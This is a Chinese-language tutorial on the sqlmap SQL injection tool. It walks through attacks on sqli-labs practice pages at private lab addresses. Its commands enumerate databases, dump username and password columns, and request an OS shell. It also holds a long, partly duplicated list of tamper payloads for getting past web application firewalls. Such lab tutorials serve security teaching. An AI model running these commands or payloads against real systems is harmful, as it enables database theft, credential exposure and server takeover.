Bootstrap

SQL注入工具Sqlmap

一、什么是Sqlmap

Sqlmap是一款开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞,并能实现数据库服务器的接管。Sqlmap提供了多种功能和选项,包括数据库指纹识别、数据读取、文件系统访问以及通过带外数据连接执行系统命令等。它支持广泛的数据库类型,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等多种常见数据库管理系统。同时,Sqlmap还支持多种类型的SQL注入技术,例如基于布尔的盲注、基于时间的盲注、基于报错的注入、联合查询注入和堆叠查询注入等。使用方法:python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。

官网下载地址:https://github.com/sqlmapproject/sqlmap

官方使用指南:https://github.com/sqlmapproject/sqlmap/wiki/Usage

二、Sqlmap参数介绍

-u
使用方法:python sqlmap.py -u [URL]
描述:该参数用于指定需要测试的URL,通常是GET类型注入的必备参数。
--batch
使用方法:python sqlmap.py -u [URL] --batch
描述:使用该参数可以在所有需要用户输入的部分(通常是询问执行yes还是no)时,自动选择默认操作,不需要用户再次输入。
--flush-session
使用方法:python sqlmap.py -u [URL] --flush-session
描述:该参数表示清除当前目标的会话文件。Sqlmap在测试某一目标URL后会生成包含本次测试结果信息的session文件,当想重新测试该目标URL时,可使用此参数。
--dbms
使用方法:python sqlmap.py -u [URL] --dbms [数据库名]
描述:该参数用于指定数据库类型。Sqlmap默认情况下会自动检测Web应用程序的后端数据库管理系统,但当你明确知道要测试的数据库类型时,可以使用此参数指定。
--level
使用方法:python sqlmap.py -u [URL] --level [等级]
描述:该参数用于指定payload测试复杂等级,共有五个级别(1-5),默认值为1。等级越高,测试的payload越复杂。当低等级注入不成功时,可以逐步提高等级尝试。
--random-agent
使用方法:python sqlmap.py -u [URL] --random-agent
描述:使用该参数,Sqlmap将随机选择请求头中的User-Agent进行请求,而不是使用默认的User-Agent。
--user-agent
使用方法:python sqlmap.py -u [URL] --user-agent="自定义User-Agent"
描述:该参数允许用户指定自定义的User-Agent字符串。
--tamper
使用方法:python sqlmap.py -u [URL] --tamper [脚本路径1],[脚本路径2]...
描述:该参数用于指定篡改脚本的路径,可以帮助绕过Web应用防火墙(WAF)和其他防御机制。常用的tamper脚本包括space2comment.py和between.py。
--technique
使用方法:python sqlmap.py -u [URL] --technique [注入类型选项]
描述:该参数用于指定要测试的SQL注入类型。Sqlmap默认会测试所有类型的注入,但可以使用此参数指定具体的注入类型,例如"BE"表示只测试布尔盲注和基于错误的注入。

三、Sqlmap基本使用 

以sqllabs第9关为例

get请求基础用法

#获取所有数据库名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs
#获取当前数据库
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db
#获取数据库security所有表名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password
#写马
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell 

post请求  --data

#获取所有数据库名称
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" --dbs
获取数据库security所有表名称
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security --tables
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users --columns
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.93.128/sqli-labs-master/Less-11/" --data "uname=312&passwd=312&submit=Submit" -D security -T users -C username,password --dump

指定文件(批量检测)-m

sqlmap -m urls.txt
指定要检测的文件(批量检测)-r
sqlmap -r http.txt  #http.txt是我们抓取的http的请求包
sqlmap -r http.txt -p username  #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
需要登录的网站  --cookie
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="抓取的cookie" #探测该url是否存在漏洞

进阶用法

检测是否有WAF   --identify-waf 
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --identify-waf
指定脚本进行绕过   --tamper 
详细看sqlmap_tamp注入的脚本.xlsx

sqlmap_tamp.xlsx文件内容:

实现方式
("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='
('1 UNION SELECT foobar')'1 UNION SELECT foobar'
('SELECT id FROM users')'SELECT+id+FROM+users'
('1 UNION SELECT 2--')'1 UNIOUNIONN SELESELECTCT 2--'
('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'
('-1 UNION ALL SELECT')'-1 UNION SELECT'
('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"
'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
Input: SELECT id FROM usersOutput: SELECT%08id%02FROM%0Fusers
('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password'
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
* Input: SELECT * FROM users WHERE id=1 2 * Output: SELECT * FROM users WHERE id LIKE 1
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('IFNULL(1, 2)')'IF(ISNULL(1),2,1)'
('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'
('1 AND 2>1--')'1 /*!30874AND 2>1*/--'
Input: SELECT id FROM usersOutput: SELECT%0Bid%0BFROM%A0users
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
('1 AND 2>1--')'1 /*!00000AND 2>1*/--'
('1 AND 9227=9227')'1--%0AAND--%0A9227=9227'
('SELECT id FROM users where id = 1')'SELECT%09id FROM users where id LIKE 1'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
* Input: 1 AND 9227=9227* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
('1 AND A > B')'1 AND GREATEST(A,B+1)=A'
tamper("1 AND '1'='1")'1 AND %00%271%00%27=%00%271'
('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'
* Input: SELECT FIELD FROM TABLE* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
* Input: INSERT* Output: InsERt
* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
* Input: SELECT id FROM users* Output: SELECT//id//FROM/**/users
('1 AND 1=1')'1 AND 1=1%00'
* Input: SELECT FIELD FROM%20TABLE* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20
‘INSERT’ becomes ‘IN//S//ERT’
;